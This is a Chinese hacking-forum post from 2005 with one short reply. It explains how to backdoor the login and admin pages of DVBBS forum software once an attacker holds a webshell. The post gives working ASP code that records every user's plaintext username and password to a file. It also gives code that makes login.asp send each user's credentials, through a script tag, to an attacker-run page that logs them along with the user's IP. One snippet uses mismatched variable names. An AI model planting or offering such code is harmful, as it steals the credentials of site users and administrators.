论坛: 黑客进阶 标题: COME~~~~~~~~ 复制本贴地址    
作者: lyplyp [lyplyp]    论坛用户   登录
获得DVBBS的所有密码新方法


我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:
老办法:
修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码

这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。

新办法:

方法一:login.asp中Case "chk"下:
   on error resume next
   dim rain
   set lP=server.CreateObject("Adodb.Stream")
   rain.Open
   rain.Type=2
   rain.CharSet="gb2312"
   rain.LoadFromFile server.mapPath("918.asp")
   rain.Position=lp.Size
   rain.writetext now&request("username")&"text:"&request("password")&chr(10)
   rain.SaveToFile server.mapPath("918.asp"),2
   rain.Close
   set rain=nothing
这样918.asp将获得全部登陆人的密码,时间和名字。
至于admin_index.asp你也可以加在这里只获得管理员的密码。
方法二:如果你有自己的网站:
建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp:
<%@codepage=936%>
<%Response.Expires=0 if request("k")="k" then%>
<pre><!--#include file="918.asp"-->
<%elseif request("n")<>"" and request("p")<>"" then
   on error resume next
   dim rain
   set rain=server.CreateObject("Adodb.Stream")
   rain.Open
   rain.Type=2
   rain.CharSet="gb2312"
   rain.LoadFromFile server.mapPath("918.asp")
   zh=rain.readtext(6152192)&"<"&"%if isempty(request(""k"")) then response.redirect ""rain.asp""%"&">"
   rain.Position=0
   rain.writetext now&"有大侠以名 "&;request("n")&" 及密码 "&request("p")&" 试图登陆;其IP:"&Request.ServerVariables("REMOTE_ADDR")&"["&Request.ServerVariables("HTTP_X_FORWARDED_FOR")&"]"&chr(13)&chr(10)&zh
   rain.SaveToFile server.mapPath("918.asp"),2
   rain.Close
   set rain=nothing
end if%>

在login.asp那里插入一句:
response.write "<SCRIPT src=http://你网站/918x/rain.asp?n="&request("username")&"&"&p="&request("password")&"></SCRIPT>"
--------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里

这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高。
                                            玉蝴蝶 上        好就顶~~~~

地主 发表时间: 05-01-29 19:31
回复: z7 [skyzz]   论坛用户   登录
顶过先 

B1层 发表时间: 05-02-01 20:08

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号